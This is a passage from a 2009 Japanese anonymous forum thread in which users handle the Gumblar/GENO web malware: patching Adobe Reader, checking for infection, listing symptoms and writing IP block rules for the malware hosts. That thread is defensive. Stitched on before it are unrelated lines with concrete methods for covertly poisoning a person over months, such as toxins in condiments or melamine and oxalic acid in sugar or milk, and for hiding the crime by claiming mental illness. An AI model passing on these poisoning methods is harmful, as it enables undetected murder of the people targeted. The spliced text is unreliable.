後マヨネーズや醤油、ソース、ケチャップ、みりんなどなど毎日少しずつ使うものに弱毒性の毒物を入れておく。
ターゲットは一年以内にアポーン。
気づかれそうになったら若年性統合失調症とか何とかいえば誤魔化せます。
www.tk-telefilm.co.jp/gaslight.html
　　夜になると不思議と暗くなる部屋のガス灯…それに気づくのは私だけ…。
　　精神的に追詰められる心理サスペンスの傑作！　　
昔々から精神病ってエロエロと利用し甲斐があるようで、、、、
　ガスライティング----で検索　ガス燈の映画の影響か欧州ではよく知られた方法
メラミンやシュウ酸の粉末を砂糖や塩、牛乳に混入。確実に結石(総胆管結石、尿管結石)になる。
あかちゃんなら異物混入が疑われるが40代50代なら本人の病気ですんでしまう。
あと降圧剤や昇圧剤、利尿剤などなどいろいろあるみたいだね。
これらは砒素のように明らかな毒物でもないから発見されても犯罪の立証がむずい。
薬物毒物と鍵屋の組み合わせは非常に厄介だ。
プロの鍵屋にかかれば開かない鍵はないといわれている。
皆さま、家族全員が留守にする時はお気をつけあそばせ。
あと、尿酸とある種の(現在不明)ある種の薬物を加えると膝痛や腰痛を起こすことが出来るようだ。
重いものを持っていないのに急に腰が痛くなったなどというとき、
ひょっとすると、ひょっとするかもしれませんよ。
旅先での見も知らない人からのドリンクサービスや席を外したあとの飲み物なども危険がいっぱいですよ。
泊りがけの飛行会の後体調異変はありませんか。
---------------------------------------------
みんな気をつけようね。
どんな一流の鍵屋でも無傷で開けられない鍵作らないと、、
現状では一流の鍵屋ならどんな鍵も開けてしまう。
暴力団が借金漬けの鍵屋を支配下に置いたらやりたい放題だよ。
416 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 13:46:07 ]: 感染の確認方法は？
417 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 13:49:33 ]: >>414
延べ数なら減らないだろ
418 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 13:50:32 ]: gumblar.cnへの接続を遮断してもダメ？
419 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 13:51:28 ]: まだ感染してない人はバックアップ取っとけよ、新規インスコは設定がめんどい
もちろんほとんどの人は設定済みリカバリ用意してるだろうけど
420 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 13:54:57 ]: gumblar.cnにaguseで行ったらadblockのgumblar.cnカウントが5になってんだけど
これ大丈夫だよね？
もしabblockでgumblar.cnをブロックしてないと、abuseでgumblar.cn見ても駄目なんじゃ？
421 名前：名無しさん＠お腹いっぱい。 [2009/05/14(木) 13:57:51 ]: 〉〉419

感染の真偽はまだわからないが、
リカバリーディスク作ってなかった僕はどうすればいいでしょうか？
422 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 13:59:46 ]: >>421
クリーンインストール
423 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 14:09:41 ]: プリインストールじゃなければいいけど
424 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 14:11:55 ]: >>420
まじだな
aguseで怪しいサイト踏みまくったんだが・・・・
おれもgumblar.cnがカウントされてた
425 名前：名無しさん＠お腹いっぱい。 [2009/05/14(木) 14:17:54 ]: 〉〉423

プリインストールでした本当に(ry

詰んだか？ＯＳはVISTAだけども、、、
後処置法何かある？
426 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 14:18:45 ]: すまん、Adobe　Acrobatとreaderってどう違う？
プログラムの削除画面で、Acrobatがなくてreaderしかないんだが、readerだけアップデートしとけば良いってことなんだろうか？
427 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 14:21:39 ]: >>426
Acrobatは有償の製品版。PDF作成機能がある。
428 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 14:23:44 ]: >>420 >>424
マジか
ヤバすぎるだろaguse
429 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 14:23:46 ]: 誰か>>304にも答えてほしいです。
vistaだしjavaスクリプトも切ってるから一応このままアップデートしなくても大丈夫かな・・・？
430 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 14:24:26 ]: >>425
VistaでGenoに感染したのなら、初の例じゃないか？
JavascriptはVer.6以上のWindowsをはねてるし。
431 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 14:24:49 ]: read：読む[er]

readerが9.1.0ならreader開いてヘルプのとこから9.1.1にアップデートできる
あと設定からAdobereaderJavaScriptも切っとけ
432 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 14:25:33 ]: www.google.com/safebrowsing/diagnostic?site=94.247.2.195
2009/04/09(木)　 7560 個
2009/04/17(金)　 8567 個
2009/04/19(日)　11795 個
2009/04/27(月)　15096 個
2009/04/28(火)　13612 個
2009/05/03(日)　13456 個
2009/05/14(木)　12314 個のドメインを感染させています。

www.google.com/safebrowsing/diagnostic?site=gumblar.cn
2009/05/03(日)　　623 個
2009/05/06(水)　 1108 個
2009/05/07(木)　 1951 個
2009/05/08(金)　 1437 個
2009/05/09(土)　　648 個
2009/05/14(木)　　 24 個のドメインを感染させています。
433 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 14:27:10 ]: >>430
そっか。XPでもUAを偽装しておけばGenoを防げるなｗ
434 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 14:27:27 ]: >>420
怖いからVMwareでやってみた
俺もgumbarがカウントされてることを確認した・・・・
435 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 14:28:06 ]: >>427 >>431
わかった。あり。
436 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 14:28:17 ]: >>430

いやまだカスペチェックしてないからワカラン

しかしＩＥがよく落ちたりするからさ
437 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 14:31:44 ]: 感染の確認方法おしえろやクズ
438 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 14:34:54 ]: >>437
クズに教えを請うなんて恥ずべきことだぞ
439 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 14:37:25 ]: 再起動して戻ってこれたら感染してない
440 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 14:42:22 ]: 千葉女どこいっちゃったの
寂しいから出てこいよ
441 名前：名無しさん＠お腹いっぱい。 [2009/05/14(木) 14:44:37 ]: ???
442 名前：429 [2009/05/14(木) 14:44:38 ]: もしかしたら自分の質問は初心者すぎるからスルーされているのかな、と思うので
セキュリティ初心者質問スレに移動してよかですか？
マルチになる？
443 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 14:50:32 ]: 該当バージョンのアップデートを>>292でDLできないか
444 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 15:03:39 ]: >>420
>adblockのgumblar.cnカウントが5になってんだけど

これってフィルタに「gumblar.cn」って入れてるってこと？
445 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 15:04:21 ]: >>443
すんません、できました。
騒いで申し訳ないです。
有難うございます。
446 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 15:12:41 ]: >>420
「gumblar.cn」をフィルタリングしてるなら
aguseで編集したアドレスにgumblar.cnという文字列が含まれるからだと思われ

gumblar.cnのIP「94.229.65.160 - 94.229.65.191」がブロックはアクセスしてないし
ブロックもカウントされなかったから、そういうこと
447 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 15:13:50 ]: >>444
>>446
安心した　ありがとう
448 名前：445 mailto:sage [2009/05/14(木) 15:13:52 ]: すみません、もうちょっとだけ質問。
>>297はあまり気にしなくてもOK？
確かにプロパティみると9.1のままだけど。
449 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 15:15:39 ]: Adobe Readerを使う時だけインストして使い終わったらアンインストすればいいんじゃないか
すげええ面倒だけど
450 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 15:16:14 ]: >>449
えっ
451 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 15:18:22 ]: >>446
何だaguseのアドレスに反応しただけか！
あー安心したありがとう
452 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 15:19:14 ]: >>448
Adobe Reader 9.1.1 Update - Multiple Languagesはやった？
453 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 15:19:20 ]: >>450
えっ
454 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 15:20:36 ]: >>447
安心したついでに質問だけどいいかな
adblockのフィルタリングはこんな感じでいいのかな

*/94.229.[64-65].[0-255]/*
*/94.247.[2-3].[0-255]/*
455 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 15:31:11 ]: >>413
GENOだね
456 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 15:31:50 ]: なにそれこわい
457 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 15:32:28 ]: >>454
ttp://www3.atword.jp/gnome/zlkon-gumblar-%E5%95%8F%E9%A1%8C%E3%81%AB%E9%96%A2%E3%81%97%E3%81%A6/

ここの下のほうの焼却炉ってところにたくさん禁止したほうがいいアドレスあるから使ってみたらどうだい？

だけどabblockよりルーターとかPCのFWに設定しておいたほうよさそう
何か俺が勘違いしていたらごめんね
458 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 15:32:33 ]: >>454
ttp://web-g.org/post/95186717
ここ見て*/94.247.[2-3].[0-255]/*は入れたんだけど
*/94.229.[64-65].[0-255]/*も入れた方がいいの？

自分も知りたいから、詳しい人お願いしますm(_ _)m
459 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 15:32:33 ]: JavaScriptの正規表現だからそれでOK
/*とか無くてもいい
460 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 15:32:45 ]: Adobe Readerを使う時だけインストして使い終わったらアンインストすればいいんじゃないか
すげええ面倒だけど
461 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 15:32:50 ]: aguseの件はマジびびった。
ミイラ取りが。。になったかとおもたよ
462 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 15:39:02 ]: >>454
これってoperaの場合どうやればいいの？
463 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 15:41:25 ]: adblockにIPアドレスベースのアクセスフィルタ機能はないでしょ
464 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 15:42:53 ]: 425だが、

OSvistaでGENO大丈夫かと思うが心配だから
カスペ使おうと思ったがセキュリティソフトがマカフィで機能の一時停止ができない、、

他にできる確認方法ある？
WINDOWSのsqlsodbc.chmのチェックくらい？
探してもないんだが、、
465 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 15:44:56 ]: >>459
>>463

どっちが正しいの？
466 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 15:48:24 ]: 踏んでみれば分かる
467 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 15:49:49 ]: >>466
えええええええええええええええええ
468 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 15:49:58 ]: カスペのオンラインスキャンの事を言ってるなら
ニフティのが同一らしいのでそっち使うといい
469 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 15:53:01 ]: >>448
ヘルプ＞アクロバットリーダー９について　の所で
バージョン9.11になっていなければパッチ適用されてない
470 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 15:56:08 ]: >>413
＞小林製薬によれば、ユーザーが感染した恐れがあるのはダウンローダー型のトロイの木馬。主な動作としては、
＞改ざんされたページにアクセスした場合、別のページからウイルスやスパイウェアをダウンロードするという。
＞また、感染した場合には、「sqlsodbc.chm（C:\WINDOWS\system32\sqlsodbc.chm）が改変されるほか、
＞コマンドプロンプトとレジストリエディタが起動不能になることが確認されている

ああ、間違いないGENOだ。
471 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 15:56:50 ]: >>436
カスペのサポセンに聞いたらチェックする時に設定を推奨レベルではなく高にして
何度かやってみてくれと言われた。それで感染の有無が分かるはずだってさ
472 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 15:59:04 ]: >>471
オンラインスキャンでも同じ？

てかわざわざサンクス
473 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 15:59:44 ]: >>464
ニフティのがカスペエンジンだったはず。
そっち使ってみては？
474 名前：名無しさん＠お腹いっぱい。 [2009/05/14(木) 16:03:10 ]: >>473
サンクス
475 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 16:06:08 ]: >>466
俺xpだから、だれかadblock入れてる人>>454のフィルタ入れて>>384踏んでみてよ
お願いします
476 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 16:07:48 ]: >>413
小林製薬はこのウイルスに面白いネーミングをつけてくれるはず
477 名前：>>448 mailto:sage [2009/05/14(木) 16:07:49 ]: >>452
はい。>>292さんの所からやりました。
更新日時も今日の15時ぐらいになってます。
でも9.1（9.10のことですよね）のままです。
478 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 16:11:15 ]: >>468
>>452
9.1.１になってました！
ほんとーーーに有難うございます!
479 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 16:12:34 ]: >>469
ｽﾏｿ間違えた。
本当に有難う！
480 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 16:14:40 ]: どんなソフトも大体そのへんにバージョン表示されるからｗ
481 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 16:16:40 ]: >>477
Product Adobe Reader
Version 9.1.1
Platform Windows
File Name AdbeRdrUpd911_all_incr.msp
File Size 1168 KB

これだぞ　ttp://www.adobe.com/support/downloads/detail.jsp?ftpID=4452
482 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 16:18:16 ]: 感染してた！
sqlsodbc.chm見事に改変されてるううう

クリーンインストールしてくる…
483 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 16:27:07 ]: >>482
いってら～
484 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 16:30:57 ]: WinXPつかっててGDATAがアクセス拒否した。

ウェブサイトがブロックされました。
G DATA InternetSecurity 2009 がこのウェブサイトへのアクセスを拒否しました。
このサイトは感染しています。感染コード： JS:Redirector-H2 [Trj] (エンジン B)

保存してソース見たかったけどそれも出来なかった(拒否される)からエミュのWindows98でアクセスしないように保存して、ソース見た。

ttp://ghard.run.buttobi.net/1.jpg

…これ？　エミュでもアクセスして感染するとハードディスクファイルを戻すのが面倒だからね、、、
Javascriptはいつも切ってるけどこれなら感染しないのかな。
485 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 16:35:07 ]: めっさ伸びとる
486 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 16:37:25 ]: >>470
ファイル実行regeditで
起動すればセーフって事？
487 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 16:38:59 ]: ガチでパニックが起きそうだな
488 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 16:39:34 ]: >>285
489 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 16:41:52 ]: インフルよりアレかもね。
490 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 16:42:26 ]: update.microsoft.com/microsoftupdate/v6/itemdetails.aspx?iPage=1&index=0&ln=ja
これだめなん？
491 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 16:44:22 ]: あっちはいまのところ他人事だけど、こっちは目の前の火事だからな
492 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 16:46:15 ]: ワクチンないもんね。
フルインスコでなおるつっても邪魔くさいし。
493 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 16:47:55 ]: とにかくここに書いてあるIPを範囲焼き

ttp://www3.atword.jp/gnome/2000/01/13/block-list/
494 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 16:52:05 ]: 薬事日報→小林製薬という流れか？
495 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 17:00:09 ]: 笑い男事件
496 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 17:00:31 ]: >>480
そうなんですね。
全然知らなかった。
一つ賢くなったよ、有難う。
>>481
はい。
それやりました。
URLが紫になってます。

「URLが紫になってます。」だって。
初心者すぎて自分で泣けてくる。
497 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 17:27:43 ]: >>374-
乙です

一応、電凸して対応する様伝えました
498 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 17:40:37 ]: >>497
電凸した反応はどうだった？
499 名前：名無しさん＠お腹いっぱい。 [2009/05/14(木) 17:42:41 ]: >>482
感染したのはビスタの人でつか？
500 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 17:45:09 ]: 早く普通に駆除できるようにならんのかな
501 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 17:54:24 ]: >>499
ビスタにsqlsodbc.chmはないから違うと思う
502 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 17:57:59 ]: >>498
横柄の極み

同じ事を何度も言わせるわ、待たせるわ
PHSで東京から大阪まで電話代が幾ら掛かるか配慮もせんと
一回氏ね、みたいなw
503 名前：名無しさん＠お腹いっぱい。 [2009/05/14(木) 18:00:45 ]: >>501
㌧ｸｽ。
ビスタまで殺られたと思ってUNKOもらすとこだった！
504 名前：名無しさん＠お腹いっぱい。 [2009/05/14(木) 18:06:24 ]: 374=384です

avastで、全ドライブをチェックかけましたが、ウイルスは検出されませんでした
これは、最初のアラート音が鳴った時に、ページを開く前にウイルスのコードをavastが発見して
実行するのを未然防止したと考えて良いんでしょうか？
それとも、もはやavastでも検出できないような姿に変化して、ブート領域にウイルスが住み着いているんでしょうか？

何か、ウイルスに感染しているかどうか確かめる方法（どっかのディレクトリの特定ファイルが削除されているとか、
改変されているとか、新しく特定名称のフォルダ、ファイルが作られているとか・・・）ってありませんか？

とりあえず、avastで全ドライブをチェックかけて、何も出て来なければ、感染を未然に防止できたと考えてOKでしょうか？
505 名前：名無しさん＠お腹いっぱい。 [2009/05/14(木) 18:07:06 ]: たった今、うっかりGENOのホームページに行ってしまったんだがまだヤバいの？
詳しいこと知らないので、心臓バクバクいってます。
506 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 18:11:00 ]: >>471だけどカスペ先生の更新時期がもう直ぐavastは
無料なのにGENOウイルス検知するほど性能がいいのか・・
更新しないでavast使ってみようかなぁ
スレチでスマン
507 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 18:18:45 ]: 今回はたまたまavastが頑張ったという気もするけど
うちはavast＋定期的に他社オンラインスキャンで今までウィルスに引っかかった事は無いかな
508 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 18:22:17 ]: >>493
ttp://up2.viploader.net/pic2/src/viploaderf157648.png

一時間かかった・・・・・
PCtoolは設定が面倒だなぁ
509 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 18:32:08 ]: うちのルーターはIP焼き設定数上限に達しやがったぜ・・・
510 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 18:32:37 ]: >>481
なぜか実際のサイズが
2,150,400 バイト
511 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 18:40:05 ]: >>374 >>497
今そこはサイトメンテナンスしているようだ
ユーザー名とパスワードを要求してくるな
512 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 18:49:18 ]: IPブロックって、
peergurdianなんかでやるんですか？
513 名前：名無しさん＠お腹いっぱい。 [2009/05/14(木) 18:51:52 ]: GENOウイルスってトロイの木馬らしいですが、具体的にどういう悪さをするんですか？
514 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 18:55:19 ]: スレ嫁
515 名前：名無しさん＠お腹いっぱい。 [2009/05/14(木) 19:05:04 ]: スレをざっと見渡した感じでは、良く挙動が分かっていないってことですかね？
516 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 19:33:04 ]: >>515
そう書けば、誰かが教えてくれると思った？
面倒な人だね
517 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 19:35:05 ]: 書き込み>>425だが、チェックしてきたお

【ＯＳ】Vista
【セキュリティソフト】マカフィ
【ウィルスを疑った理由】saymoveの利用・ＩＥのフリーズ

【確認手段】
1：ＰＣの再起動が正常か否か
2：sqlsodbc.chm　の改変の有無
3：ニフティでのオンラインチェック

【結果】
1：正常に起動○
2：改変は無し○
3：管理者モードでＩＥ起動方法わからず・・・orz△

3がチェックできれば完璧なんだが・・・
518 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 19:41:44 ]: WHOのパンデミック警報はフェーズ5だけど、
このウイルスはフェーズ幾つぐらいよ？
519 名前：名無しさん＠お腹いっぱい。 [2009/05/14(木) 19:43:54 ]: >>516
いや、思いませんでしたよ
２ｃｈは不親切な人が多いですから
520 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 19:58:58 ]: >>518
もうフェーズ6レベルじゃね？
収まる気配ゼロだし
521 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 20:05:00 ]: >>517
カスペはやらなかったのか
522 名前：521 mailto:sage [2009/05/14(木) 20:05:52 ]: あ、すまん、ニフやってきたのね
523 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 20:24:37 ]: ・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD
524 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 20:26:32 ]: >>522
一応事故解決してニフでチェックでできたお

【ＯＳ】Vista
【セキュリティソフト】マカフィ
【ウィルスを疑った理由】saymoveの利用・ＩＥのフリーズ

【確認手段】
1：ＰＣの再起動が正常か否か
2：sqlsodbc.chm　の改変の有無
3：ニフティでのオンラインチェック

【結果】
1：正常に起動○
2：改変は無し○
3：ウィルスはなし○

ということで一応大丈夫みたい
ただちにウィルス更新とバックパックしてきま
525 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 20:26:57 ]: >>484
unescape～replaceの右上にgumblarが出てるな。
526 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 20:29:20 ]: >>523
Googleの検索結果を改竄って初めて見るが、何処の情報？
527 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 20:30:35 ]: >>526
ほい。

UnderForge of Lack ≫ Blog Archive ≫ ScanSafe reported the zlkon virus progress
www3.atword.jp/gnome/2009/04/19/scansafe-reported-the-zlkon-virus-progress/
528 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 20:31:39 ]: >>523
何でもありだなｗ
529 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 20:32:15 ]: XP厨はいつ何時やられるかわからず冷や冷やもんだな
530 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 20:40:01 ]: >>523
なぶり殺しと言うか、何と言うか…。
いっそ、HDDを綺麗さっぱりフォーマットしてくれた方が…。
531 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 20:40:56 ]: google検索改竄して自サイトへアクセスさせようとするのかな
532 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 20:46:59 ]: 終息してるし次スレは要らないね。
533 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 20:48:06 ]: >>531
アフィリエイト狙いらしい。
そこから足が付きそうだけど、匿名口座とかも使ってるんだろう。
534 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 20:48:17 ]: >>532
GENO社員乙
535 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 20:49:43 ]: >>527
thx
536 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 20:54:36 ]: このウイルス、VISTAはスルーなんだって？
俺、ＸＰなんだけど
cmd.exe、regedit.exeが起動したってことは
感染してないってことおｋなんだよね？
537 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 20:54:51 ]: >>533
なるほど、意外とこすいなぁｗ
538 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 20:55:03 ]: >>532
逆に拡散してると思うがｗ
539 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 20:56:16 ]: >>536
念のために

【確認手段】
1：ＰＣの再起動が正常か否か
2：sqlsodbc.chm　の改変の有無
3：ニフティでのオンラインチェック

ぐらいはしておいたほうが･･･
540 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 20:57:58 ]: >>523
・ゾンビ化も追加
ソースは>>324

>>530
生かさず殺さずだね
541 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 20:58:16 ]: ＶＩＳＴＡ感染報告きてるね
542 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 20:59:01 ]: まだ未確定の段階か
543 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 21:00:22 ]: >>541
まじすか？
544 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 21:01:02 ]: >>508
素直にPG2で設定しろよ。
545 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 21:02:17 ]: >>532
なんか久しぶりだな。GENO社員乙ｗ
546 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 21:06:01 ]: ・Googleの検索結果を改竄(リンクを弄る)

↑これどうやって確認すればいいの？
547 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 21:08:38 ]: >>543
まだ詳しいことかいてないからわからないけど、一応貼っとくね

***
あの有名動画サイトSayMove!がGenoウイルスに感染、アクセスした乞食どもやばいぞ
tsushima.2ch.net/test/read.cgi/news/1242145955/864

864 名前：キクザキイチゲ(中国地方)[sage] 投稿日：2009/05/14(木) 20:24:48.23 ID:0ZvJo5LH
該当時間のsaymoveにアクセスした後、パソコンの挙動がえらい不安定に
なったんだけど、やっぱりこれって喰らってしまったんでしょうか？。

ビスタHomePremium64bit+avast!なんですけど、
頻繁にフリーズするようになった（PCを購入して約２年一度も無かったのに、
一昨日から今日までに７回もフリーズ。）

あと、ついさっき、
スリープにしてても勝手に復帰している
スリープから復帰して暫くすると、ＨＤＤを認識しないようになる
といった症状がでた。

一応、カスペルスキーのオンラインスキャンの重要な部分だけを試して
みたけど、検出はされませんでした。トレンドマイクロの方も同様。

報告されている症状と全く違うんですが、どうなんでしょ？。
548 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 21:11:54 ]: >>546
アフィのスクリプトをひとつずつページソースで確認するしかないでしょ。
549 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 21:19:11 ]: >>548
面倒だなｗ

firefoxなんだけどWOT（Web of Trust）とか入れてもだめなのかな？

ちなみにWOTって「分かりやすく色分けされたWOTアイコンによって
サイトへのリンクをクリックする前に、オンライン詐欺、なりすまし
不審なショッピングサイト、セキュリティの脅威などを回避できます」
というアドオンですが、自分は入れてません
550 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 21:27:16 ]: avastさんが感知してくれたのに誤作動だと思って突っ込んで感染した俺だけど
やっぱりIEがよく反応無しになる、おまけにパソゲーも反応無しになる
今カスペルスキーってとこでオンラインスキャンしてるが
このウイルスはどこに感染するんだ？32のチェックはもう終わったみたいだが
何も検出されなかったぞ？
全領域でやったら一件検出されたが何か勝手に止まったわ
551 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 21:29:10 ]: ググれば一番上にくるからすぐ分かると思うけど「ライブハウスあさがやドラム」の
サイトも怪しいらしいのですが、誰かvistaの人確認してくれないかなｗ
552 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 21:29:54 ]: >>550
感染が確実なら時間勿体無いから即リカバリしたほうがいいよ。
疑心暗鬼で使い続けるのは精神的に辛いでしょ
553 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 21:32:09 ]: >>550
新種が毎日出ててカスペも新種は当然スルー
554 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 21:32:22 ]: >>552
代えのHDDがねえんだよっ！仕事ねえからさ･･･
555 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 21:35:39 ]: Aviraは感知してくれる？

誤作動はないし、>>539でチェックしても問題ないから、
いまんところ被害はないと思うけど、
怖いものみたさで問題サイト踏んでみたいという妙な欲望も・・・
556 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 21:36:23 ]: >>551
感染してる
